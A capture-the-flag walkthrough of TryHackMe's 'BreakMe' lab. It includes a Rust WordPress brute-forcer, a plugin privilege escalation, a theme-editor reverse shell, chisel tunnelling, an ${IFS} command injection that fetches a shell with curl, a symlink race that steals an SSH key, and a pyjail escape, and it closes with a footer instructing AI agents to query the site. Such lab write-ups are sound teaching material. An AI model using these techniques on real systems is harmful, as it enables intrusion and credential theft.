# BreakMe (THM)
#### Hello Eveyone again. Today we having Break Me from THM shell we?.
## Enum
#### Port scanning.
#### I scan using my tool web\_tester if you would like to try it you can find it here.
#### So as we can see we have port 22,80 and we have manual directory let’s dig more and see what we have.
## Inital Access
#### After some search i found a directory called wordpress. Which seems to contain the main website.
#### So after a log session of searching i found something intresting use wpscan.
#### Two users so we all know when you try to enter a password for a valid username in wordpress you will get a message say that the password is incorrect while the username is such this.
#### With that i decided to create simple script with rust to brute force the password.
```rust
use reqwest::{blocking::Client, cookie::Jar };
use std::{collections::HashMap, fs::File, io::{BufRead, BufReader}, sync::Arc};
use threadpool::ThreadPool;
fn test(client: Client, password: &str, target:&str){
// log=asd&pwd=asd&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.187.97%2Fwordpress%2Fwp-admin%2F&testcookie=
let mut params = HashMap::new();
params.insert("log", "admin");
params.insert("pwd", password);
params.insert("wp-submit", "Log in");
params.insert("redirect_to", "");
// params.insert("testcookie", "1");
let res = client.post(target)
.form(¶ms)// This will send the data as application/x-www-form-urlencoded by default
.send()
.expect("Error while sendig the request");
let status = res.status();
let body = res.text().expect("Error while red the res");
// println!("{:#}", body);
if status.is_success() && !body.contains("incorrect."){
println!("Password Found : {password}");
}
}
fn main() {
let jar = Arc::new(Jar::default());
let thread = ThreadPool::new(30);
let file = File::open("/home/pythonic/Downloads/rockyou.txt").expect("Error while opening the file");
let target = "";
let client = Client::builder()
.cookie_store(true) // Enable cookie storage
.cookie_provider(jar) // Set the jar for cookies
.build()
.expect("Error while building client");
let reader = BufReader::new(file);
for f in reader.lines(){
let client_clone = client.clone();
// let target_clone = target.clone();
thread.execute(move || {
if let Ok(password) = f {
test(client_clone, &password, target);
}
})
}
thread.join();
println!("Hello, world!");
}
```
#### You can find the whole code here.
#### So after i run the code i indded find it.
```python
username : bob
password : soccer
```
#### So after some more search i found this.
```python
[+] wp-data-access
| Location:
| Last Updated: 2024-09-18T00:01:00.000Z
| [!] The version is out of date, the latest version is 5.5.14
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
| Fixed in: 5.3.8
| References:
| -
| -
| -
|
| [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
| Fixed in: 5.3.11
| References:
| -
| -
|
| [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
| Fixed in: 5.5.9
| References:
| -
| -
| -
|
| Version: 5.3.5 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| -
```
#### Which mean we have 2 CSRF and on PE in our current state let’s search more on the PE to try to upgrade our user into admin.
so i found this.
[Privilege Escalation Vulnerability Patched Promptly in WP Data Access WordPress Plugin](https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/)
#### Which state that the problem is that the WP Data Access plugin does not check for the athuorization of the user to change his role meaning any user with simple privilage can change his privilage to administrator.
#### So as you can see above in the burp image i added the `wpda_role[]=administrator`. which make us admins as you can see in the second image.
for now let’s have inital foot on the machine.
#### As for inital foot was easy just navigate to the tool → theme file editor. Then.
#### Choose the 404.php then paste you reverse shell then make sure to change the theme to edit am not sure why but i was having and issues with the original one. anyway that should be it.
#### And yeah.
## John
#### After that i start enumerate the machine i found user called john which we have access to his directory. Than i saw this.
#### So john has a php server running on port 9999 so we need to find a way to make tunnling to see what is that server running. We can use tool called chisel.
#### So i installed the last relese.
```python
www-data@Breakme:/tmp$ wget
```
#### And execute this code on the target machine to upload it into the target machine. and open a python server in my local machine.
```python
python3 -m http.server 8000
```
#### After that we can execute this code on our machine.
```python
chisel server --reverse --port 8001
```
#### And the following code on the target system
```python
www-data@Breakme:/tmp$ ./chisel_1.10.1_linux_amd64 client 10.11.96.110:8001 R:9999:localhost:9999
```
#### This code will connect to port 8001 on our machine and will forward port 9999 from the target machine. To our machine on port 9999.
And we will see this page.
#### So after some testing i see that it delete the spaces by default.
#### So as you can see it trim all the spaces so we maybe able to do something if we find some trick to bypass this.
So there is a charecter called IFS. This in unix based system used to represent a space so if are able to inject this we maybe able to execute the command.
#### So as you can see we added to the command ${} which used for subsitute And we are able to execute the command.
#### With that we can easly now get a shell.
#### Simple revese shell will do. Now we just need to setup the python server.
```python
|curl${IFS}
```
#### So the final code will be something like this. Do not forget to setup a listener.
#### And here we are as john.
#### And this is our first flag. A long run.
## Youcef
#### After that i decide to do an SSH key using. ssh-keygen.
```python
ssh-keygen -f john
```
#### this command will are generate public and private keys for john.
just move the .pub key into `.ssh/authorized_keys` then copy the private key into your machine and change its permisions to 600 and you should be able to login via ssh. Which is much better.
#### Now we need to get the user yousef so when we access there we will see readfile code which we do not have access to the source code.
So we need to revese enginner it.
#### So to begin with we can see that there are a lof of checks.
1. if the arguments 2.
2. if the uid of the user is 1002 (which john uid)
3. Checks if the file contains symbolic link or not.
4. is the file name contain flag or id\_rsa.
[Abusing Time-Of-Check Time-Of-Use (TOCTOU) Race Condition Vulnerabilities in Games, Harry Potter Style | Trustwave](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/abusing-time-of-check-time-of-use-toctou-race-condition-vulnerabilities-in-games-harry-potter-style/)
#### As we can see the code contains race condition why??
First because each checks are sperated so it maybe possiable to pass some checks and read a file that does not met the conditions. So we maybe able to create a file to uses a symbolic link that refers to the id\_rsa of the youcef user but still the permition of the symbolic link will be the same as the original file meaning we will not be able to read it. Do not forgot that the readfile have suid meaning it executed as youcef so if we somehow are able to create symbolic file and change it between symbolic and normal file to exploit the Race Condition.
```python
while true; do ln -sf /home/youcef/.ssh/id_rsa key; rm key; touch key; done &
```
#### This code will create symbolic file that link to id\_rsa and remove it and created again forever.
```python
for i in {1..50}; do /home/youcef/./readfile key; done
```
#### Here where we exploit the Race Condition we using the readfile code to read the file content with youcef permition. And by doing that we will eventully see the key.
#### And after that we just crack it with john.
```python
ssh2john key_j > hash
```
#### key\_j is you file that contain the key.
## Root
#### As for the final run to became root.
#### We can see that the current user has root access to [jail.py](http://jail.py) so let’s see what it has.
#### So it a program that allow us to execute interactive python code. But it so restricted meaning we can not simple run anything.
So this could be simple we have a build in function in python called breakpoint().
[Python breakpoint() | DigitalOcean](https://www.digitalocean.com/community/tutorials/python-breakpoint)
#### Such function if we can execute it in the interactive shell we will be able to run what ever code we want.
#### Surly we will not be able right ??. What about some tricks we can use encoding hopping that we maybe able to bypass it.
```python
𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵() #
```
#### the code above has been taken from.
[Shirajuki - A CTF player from Norway, @iku-toppene, @bootplug, @corax, @rumbleinthejungle and @cybersalmons](https://shirajuki.js.org/blog/pyjail-cheatsheet#unicode-bypass)
#### Now that we enter the debug mode we can execute anything.
#### And as simple as that we have root access. 😁.
#### In the end i hope you enjoy and thank you for reading. 👹.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://pythonic01.gitbook.io/pythonic01/try-hack-me/breakme-thm.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.